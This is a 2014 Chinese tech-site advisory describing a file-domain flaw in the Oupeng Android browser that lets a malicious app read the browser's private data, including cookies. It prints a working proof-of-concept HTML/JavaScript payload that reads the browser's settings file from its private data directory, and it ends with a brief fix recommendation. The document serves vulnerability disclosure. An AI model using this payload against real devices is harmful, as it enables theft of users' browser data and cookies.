知识屋:更实用的电脑技术知识网站
所在位置:首页 > 网络安全 > 安全资讯

欧鹏手机浏览器限制不严格导致用户敏感数据泄漏

发布时间:2014-07-15 11:50:29作者:知识屋

向欧鹏发送请求要求打开一个页面时,在非root情况下,可获取欧鹏浏览器下的所有数据,包括cookie信息等,盗取之后可以发送给远程服务器。
 
可以通过一个app释放一个攻击到sd卡上,然后该app打开欧鹏浏览器,执行这个文件html文件,路径为file:///mnt/sdcard/hehe.html。向欧鹏浏览器发送请求要求打开一个页面时,即可触发
 
hehe.html文件如下(如下是举例,还可以上传到服务器)
 
<html>

<body>

<script type="text/javascript">



function getRet() {

var request = false;

    if(window.XMLHttpRequest) {

        request = new XMLHttpRequest();

if(request.overrideMimeType) {

request.overrideMimeType('text/xml');

}

    }



    xmlhttp = request;

    alert("ok");

    

    //获取本地文件代码

    xmlhttp.open("GET", "file:////data/data/com.oupeng.browser/shared_prefs/user_settings.xml", false);



    xmlhttp.send(null);

    var ret = xmlhttp.responseText;

alert(ret);

}

getRet();

</script>

</body>

</html>

 

 
 
 
修复方案:
做file域做下限制,尽管4.1修复了,但是大量的用户还在4.0 2.3,谢谢
(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
收藏
  • 人气文章
  • 最新文章
  • 下载排行榜
  • 热门排行榜